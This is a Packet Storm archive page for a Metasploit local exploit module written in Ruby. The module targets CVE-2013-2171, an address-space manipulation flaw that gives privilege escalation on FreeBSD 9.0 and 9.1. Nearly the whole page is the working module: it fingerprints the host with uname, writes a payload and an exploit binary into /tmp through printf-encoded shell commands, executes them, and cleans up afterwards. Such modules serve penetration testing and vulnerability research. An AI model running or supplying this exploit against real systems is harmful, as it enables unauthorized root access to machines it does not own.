all things security

FreeBSD 9 Address Space Manipulation Privilege Escalation

FreeBSD 9 Address Space Manipulation Privilege Escalation
Posted Jun 26, 2013
Authored by Alan Cox, Hunger, sinn3r, Konstantin Belousov | Site metasploit.com

This Metasploit module exploits a vulnerability that can be used to modify portions of a process's address space, which may lead to privilege escalation. Systems such as FreeBSD 9.0 and 9.1 are known to be vulnerable.

tags | exploit
systems | freebsd
advisories | CVE-2013-2171, OSVDB-94414
MD5 | b258cd8526da63e79f9daeb6f93717bc

FreeBSD 9 Address Space Manipulation Privilege Escalation

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Local
Rank = GreatRanking

include Msf::Exploit::EXE
include Msf::Post::Common
include Msf::Post::File
include Msf::Exploit::FileDropper

def initialize(info={})
super( update_info( info, {
'Name' => 'FreeBSD 9 Address Space Manipulation Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability that can be used to modify portions of
a process's address space, which may lead to privilege escalation. Systems
such as FreeBSD 9.0 and 9.1 are known to be vulnerable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Konstantin Belousov', # Discovery
'Alan Cox', # Discovery
'Hunger', # POC
'sinn3r' # Metasploit
],
'Platform' => [ 'bsd' ],
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'References' =>
[
[ 'CVE', '2013-2171' ],
[ 'OSVDB', '94414' ],
[ 'EDB', '26368' ],
[ 'BID', '60615' ],
[ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ]
],
'Targets' =>
[
[ 'FreeBSD x86', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => "Jun 18 2013",
}
))
register_options([
# It isn't OptPath becuase it's a *remote* path
OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
], self.class)

end

def check
res = session.shell_command_token("uname -a")
return Exploit::CheckCode::Appears if res =~ /FreeBSD 9\.[01]/

Exploit::CheckCode::Safe
end

def write_file(fname, data)
oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\"
session.shell_command_token("printf \"#{oct_data}\" > #{fname}")
session.shell_command_token("chmod +x #{fname}")

chk = session.shell_command_token("file #{fname}")
return (chk =~ /ERROR: cannot open/) ? false : true
end


def upload_payload
fname = datastore['WritableDir']
fname = "#{fname}/" unless fname =~ %r'/$'
if fname.length > 36
fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than 33 characters")
end
fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}"

p = generate_payload_exe
f = write_file(fname, p)
return nil if not f
fname
end

def generate_exploit(payload_fname)
#
# Metasm does not support FreeBSD executable generation.
#
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin")
x = File.open(path, 'rb') { |f| f.read(f.stat.size) }
x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00"))
end

def upload_exploit(payload_fname)
fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
bin = generate_exploit(payload_fname)
f = write_file(fname, bin)
return nil if not f
fname
end

def exploit
payload_fname = upload_payload
fail_with(Exploit::Failure::NotFound, "Payload failed to upload") if payload_fname.nil?
print_status("Payload #{payload_fname} uploaded.")

exploit_fname = upload_exploit(payload_fname)
fail_with(Exploit::Failure::NotFound, "Exploit failed to upload") if exploit_fname.nil?
print_status("Exploit #{exploit_fname} uploaded.")

register_files_for_cleanup(payload_fname, exploit_fname)

print_status("Executing #{exploit_fname}")
cmd_exec(exploit_fname)
end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    11 Files
  • 21
    Jul 21st
    4 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close